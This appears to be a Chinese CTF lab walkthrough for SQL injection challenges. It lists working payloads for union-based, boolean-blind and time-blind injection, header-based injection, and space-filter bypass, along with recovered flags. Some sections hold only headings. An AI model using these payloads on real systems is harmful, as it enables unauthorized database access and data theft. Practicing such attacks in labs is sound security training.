1. SQL 注入
1.1. 整数型注入
1
2
3
4
1 #显示
1 and 1=1 #显示
-1 union select 1,2,3 #不显示
-1 union select 1,2 #显示
获取数据库和表
获取 flag 表字段
获取 flag
1.2. 字符型注入
1
2
3
# 字符型确认
?id=1' and 1=1--+
?id=1' and 1=-1--+
1.3. 报错注入
1.4. 布尔盲注
经测试只有 query_errorquery_success 两种
布尔盲注
1
2
3
1 and (select count(table_name) from information_schema.tables where table_schema=database())=2 -- 表数量2
1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4 -- 表1长度4
1 and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4 -- 表2长度4
1
1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=100 --
表名:flag
1
2
1 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag')=1 -- 列数1
1 and length((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1))=4 -- 列长度4
1
1 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1),1,1))=100 --
列名:flag
1
1 and length((select flag from flag limit 0,1))=32 --
1
1 and ascii(substr((select flag from flag limit 0,1),1,1))=100 --
<font style="color:rgb(139, 139, 139);">ctfhub{f127288b7d5f415118ee54ed}</font>
1.5. 时间盲注
1
2
3
4
5
6
7
8
9
10
1 and sleep(3) -- 数字型注入
1 and if((select count(table_name)from information_schema.tables where table_schema=database())=2,sleep(3),0) -- 表数量2
1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=4,sleep(2),0) -- 表1长度4
1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=4,sleep(2),0) -- 表2长度4
1 and if(ascii(substr((select table_name from information_schema.tables where ta
ble_schema=database() limit 1,1),§1§,1))=§100§,sleep(2),0) -- 表1:news;表2:flag
1 and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name='flag')=1,sleep(2),0) -- flag表列数量1
1 and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='flag'))=4,sleep(2),0) -- 列1长度4
1 and if(ascii(substr((select column_name from information_schema.columns where
table_schema=database() and table_name='flag'),§1§,1))=§100§,sleep(2),0) -- 列1名flag
1
1 and if(ascii(substr((select flag from flag),§1§,1))=§100§,sleep(2),0)
<font style="color:rgb(139, 139, 139);">ctfhub{77f14ac024782fa5cb10968e}</font>
1.6. MySQL 结构
1
2
1 union select 1,2
1 union select 1,2,3
确定查询两列
1.7. Cookie 注入
1.8. UA 注入
1.9. Refer 注入
原请求无 refer,手动添加
1.10. 过滤空格
-1 union select 1,2
-1/**/union/**/select/**/1,2
1
-1/**/union/**/select/**/database(),group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()
1
-1/**/union/**/select/**/database(),group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iwnukmmbul'
1
-1/**/union/**/select/**/database(),group_concat(pvrmhtxmxm)from/**/iwnukmmbul
